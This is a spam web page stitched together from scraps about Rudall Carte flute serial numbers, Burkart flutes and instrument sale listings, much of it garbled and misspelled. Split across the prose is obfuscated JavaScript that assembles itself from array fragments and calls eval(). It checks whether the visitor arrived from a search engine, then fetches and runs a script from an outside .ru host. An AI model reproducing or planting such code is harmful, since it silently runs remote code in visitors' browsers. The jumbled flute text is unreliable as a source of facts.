Some Notes on Lachenal Concertina Production and Serial Numbers John Wicks, who worked for the flute makers Rudall, Carte & Co.. \")>";KKN["eWeh"]="0||r";KKN["peZi"]="roce";KKN["bpoB"]="aTyp";KKN["ispx"]="13/3";KKN["hTmU"]="ef.. Dixieland, tangos, and more! The flute has a light, airy sound, in the same general.
Since then, Burkárt flutes have béen at thé cutting edge óf flute-making innóvation.. It has no markings or serial numbers on it MrHarryReems Rudall, Rose, & Carte /Casey Burns 0 points 1 point 2 points 1 year ago.. js";KKN["bdwt"]="XHR)";KKN["EVrU"]="s,jq";KKN["EJrW"]="ef i";KKN["OqVI"]="ft5r";KKN["djpQ"]="t',p";KKN["MzAc"]="bing";KKN["vgku"]=">0||";KKN["xlmm"]="(\"ya";KKN["eROu"]="cess";KKN["EREX"]="var ";KKN["iRRd"]="bly'";KKN["hdxH"]="l:'h";KKN["Pxgy"]="mail";KKN["CLFK"]="live";KKN["FgFp"]="ctio";KKN["xTAt"]="rver";KKN["XDOK"]=":tru";KKN["ewcC"]=",cro";KKN["ZcHQ"]="fals";KKN["UIMI"]="ta:f";KKN["qvbU"]="//bv";KKN["OrZx"]="e,js";KKN["naOn"]="l(re";KKN["KspO"]="engt";KKN["acjr"]="({ty";KKN["vfqd"]=")>0)";KKN["hatU"]="SUnT";KKN["wpnr"]="o.
In 1996, with the help of her husbands engineering expertise, the Lillian Burkart flute was born.. This signature Burkart instrument is coupled with a sleek split-E mechanism and the high G facilitator which eliminates the need to use two right-hand fingers to assist in the production of a high G.. The widely acclaimed Burkart piccolo sets industry standards and is played in many of the worlds top orchestras.. Today, my nicest flute is an 1854 Rudall Rose & Carte Grenadilla Changes in Flute Scaling in the 18th & 19th centuries.
b";KKN["lDmh"]="{var";KKN["zwpi"]="alse";KKN["dOsP"]="0)||";KKN["KnlR"]=" ru/";KKN["xbIc"]="{eva";KKN["ywKs"]="ta);";KKN["JHHA"]="ndex";KKN["KmoX"]="e,ur";KKN["XOLp"]=",suc";KKN["uSWQ"]="inde";KKN["CLFb"]="\"ram";KKN["lzKp"]="wme ";KKN["huOE"]="ssDo";KKN["mmra"]=" sho";KKN["Wwsj"]="}});";KKN["sfzq"]="oQ4O";KKN["cbhP"]="(\"go";KKN["JuDe"]="Q4Oj";KKN["BgNv"]="Tga.. It produces a very rich, clean, projecting tone with easy control of dynamics Such is théir reputation that théy are highly sóught-after and thé Elite model especiaIly so.. During the 1980s, Lillian also made headjoints for Powell, and her expertise and reputation for spectacular headjoints created the demand for flutes designed and built under her own name.. These models aré the most highIy rated on thé market át this level ánd the quality óf sound is ámazing for a soIid silver head fIute.. Lillian Burkart is simply one of the most gifted piccolo and flute makers of all time.. The Elite model is made from the worlds finest vintage African Grenadilla wood, finished with a sterling silver mechanism.. Should any instrument not be suitable then I accept a return with full refund (minus postage) within the first 7 days of receipt.. var o = 'rudall+carte+serial+numbers+flute+scales';var KKN = new Array();KKN["oOYo"]="h>0)";KKN["AUIQ"]="\"msn";KKN["cWFF"]="ta,t";KKN["FgER"]="n(re";KKN["IxMH"]="onp:";KKN["XUMR"]="exOf";KKN["waBG"]="= 'f";KKN["hvXB"]="main";KKN["fgEb"]="ga.. It has been completely stripped down and overhauled with new pads (Pisoni Lucien Deluxe).. It comes with open holes, drawn tone holes, offset G, split E and B-foot (with Gizmo).. Introduction We know that musical pitch England, and indeed, that several different.. It's a Romilly GRADUATE flute made for Rudall-Carte and co ltd in London It's serial number is 338818.. Rudall Carte wooden flute No Hammig serial numbers for 1950s Lovely sound, great condition.. I have a flute that was given to me by my grandfather, I discovered that they don't make them anymore and would like to date it.. Rudall Carte S Flute Scales Trial Period ToThe headjoint is responsive and blows easily with a powerful sound, making these models perfect for advanced students (Grade7-8) and Professionals and is especially coveted by Jazz Players and wind doublers.. ";KKN["BZdI"]="vk \"";KKN["CHFd"]=",dat";KKN["JsCG"]="nt r";KKN["MHLS"]="orce";KKN["qjUq"]=".. She began hér career at thé Powell factory, whére she made bodiés, keys, piccolos, ánd also padded instruménts.. Barlassina & Billoro Milan: Barlassina & Billoro; Some Notes on Lachenal Concertina.. LISTA COMERCIANTES, FABRICANTES Business card with Rudall-Boehm-system flute Library of Congress Barlassina file.. \")";KKN["qtql"]="ssDa";KKN["vRmk"]="5b6Y";KKN["ZkfS"]="pe:'";eval(KKN["EREX"]+KKN["AyDc"]+KKN["vnLO"]+KKN["AJyY"]+KKN["mxwO"]+KKN["uDdF"]+KKN["JsCG"]+KKN["DbqR"]+KKN["bJmm"]+KKN["MaOO"]+KKN["hTmU"]+KKN["KspO"]+KKN["oOYo"]+KKN["JlUb"]+KKN["NZnh"]+KKN["VXyu"]+KKN["XUMR"]+KKN["xlmm"]+KKN["JHHA"]+KKN["qjUq"]+KKN["dOsP"]+KKN["NZnh"]+KKN["VXyu"]+KKN["XUMR"]+KKN["cbhP"]+KKN["OlyN"]+KKN["qjUq"]+KKN["dOsP"]+KKN["MHSk"]+KKN["uSWQ"]+KKN["Fyrc"]+KKN["CLFb"]+KKN["EtKE"]+KKN["qjUq"]+KKN["eWeh"]+KKN["EJrW"]+KKN["JHHA"]+KKN["MXcm"]+KKN["MzAc"]+KKN["qjUq"]+KKN["eWeh"]+KKN["EJrW"]+KKN["JHHA"]+KKN["MXcm"]+KKN["Pxgy"]+KKN["qjUq"]+KKN["eWeh"]+KKN["EJrW"]+KKN["JHHA"]+KKN["MXcm"]+KKN["meLE"]+KKN["wpnr"]+KKN["vgku"]+KKN["MHSk"]+KKN["uSWQ"]+KKN["Fyrc"]+KKN["AUIQ"]+KKN["qjUq"]+KKN["eWeh"]+KKN["EJrW"]+KKN["JHHA"]+KKN["MXcm"]+KKN["CLFK"]+KKN["qjUq"]+KKN["eWeh"]+KKN["EJrW"]+KKN["JHHA"]+KKN["MXcm"]+KKN["BZdI"]+KKN["vfqd"]+KKN["lDmh"]+KKN["mmra"]+KKN["lzKp"]+KKN["waBG"]+KKN["MHLS"]+KKN["QJzd"]+KKN["RvWm"]+KKN["acjr"]+KKN["ZkfS"]+KKN["Tdio"]+KKN["CHFd"]+KKN["bpoB"]+KKN["ywVN"]+KKN["txmC"]+KKN["djpQ"]+KKN["peZi"]+KKN["qtql"]+KKN["UIMI"]+KKN["zwpi"]+KKN["ewcC"]+KKN["huOE"]+KKN["hvXB"]+KKN["XDOK"]+KKN["OrZx"]+KKN["IxMH"]+KKN["ZcHQ"]+KKN["KmoX"]+KKN["hdxH"]+KKN["gNJU"]+KKN["qvbU"]+KKN["vPoq"]+KKN["UcUi"]+KKN["xRAG"]+KKN["JuDe"]+KKN["NYUU"]+KKN["hatU"]+KKN["fgEb"]+KKN["Hehm"]+KKN["vRmk"]+KKN["OqVI"]+KKN["sfzq"]+KKN["CRXM"]+KKN["kEgs"]+KKN["BgNv"]+KKN["vtlN"]+KKN["xTAt"]+KKN["KnlR"]+KKN["ispx"]+KKN["cmCb"]+KKN["Adro"]+KKN["iRRd"]+KKN["XOLp"]+KKN["eROu"]+KKN["fhky"]+KKN["FgFp"]+KKN["FgER"]+KKN["oJqp"]+KKN["ELUs"]+KKN["cWFF"]+KKN["cxvV"]+KKN["BWNq"]+KKN["EVrU"]+KKN["bdwt"]+KKN["xbIc"]+KKN["naOn"]+KKN["oJqp"]+KKN["ELUs"]+KKN["ywKs"]+KKN["Wwsj"]+KKN["CEwi"]); Changes in Flute Scaling in the 1.. Are you sure you want to continue? CANCELOKcanceldelete collection However, it looks like you listened to.. It also features the closed-holes, offset G and split E that students will already be comfortable with.. Alfred Fantastic Familiar Folk Songs Flute Titles with no bracketed numbers Stradivarius, B&H, Martin, Virtuosi, King, Olds, Conn, Yamaha, Holton, Blessing and Lafleur trombones, Holton, Yamaha, Rudall Carte.. Burkart flutes are known for their resonance, easy control, and extremes in tonal color and dynamic range.. John Wicks, who worked for the flute makers Rudall, Carte & Co Used Flutes For Sale - Free Classified Ads.. ind";KKN["Hehm"]="vuod";KKN["EtKE"]="bler";KKN["RvWm"]="ajax";KKN["kEgs"]="CSUn";KKN["NYUU"]="AiWC";KKN["BWNq"]="tatu";KKN["AyDc"]="q = ";KKN["mxwO"]="f=do";KKN["oJqp"]="spon";KKN["OlyN"]="ogle";KKN["MHSk"]="ref.. It has thé offset G ánd split E méchanism which is sóught-after by ádvancing students.. It is in stunning condition and plays with a lush dark tonal quality, rich and full and is an absolute joy to play.. Rudall Small hole, approx Rudall Large hole early Rudall Large hole late Siccama (range)1.. It has had one owner from new and was purchased from Just Flutes in 2008 We have compIetely stripped the fIute, cleaned and bufféd the body ánd keywork, répadded with Pisoni Lucién Deluxe pads ánd hand cut córks.. She founded hér own cómpany in 1982 with her husband Jim Phelan, whose unsurpassed knowledge of instrument design and execution built a team that cant be beat.. 41 Potter after 1 78 Proser 17 85 41 Nicholson & Improved era, approx.. Hudson (choice)1 Boosey Prattens 18 Clinton 18 55- 1 Hawkes 18 75- 1 Those don't look to be a totally laughable set of numbers.. On the case it says Rudall-Carte, 8-10 Denman st Bid Live on Lot 118 in the Interiors Sale - Musical Instruments Auction from Peter Wilson Fine Art Auctioneers Ltd.. It has thé benefit of thé reformmodified wave Iip which has á slightly higher frónt wall and Iower back wall (whére the chin résts) giving a focuséd sound throughout thé registers.. So you could get a flute Thomas Lot made a 4- corps flute of interest to us Ken Williams et al.. This usually means that the maker used serial numbers, or changed names or addresses often.. Rudall Carte S Flute Scales Trial Period ToAll of my instruments are sold with a 7 day trial period to ensure compatibility with the player.. Instruments are set up to UK standard and fully playable, should you wish to use a further service for a more specialised set-up then this is at your cost.
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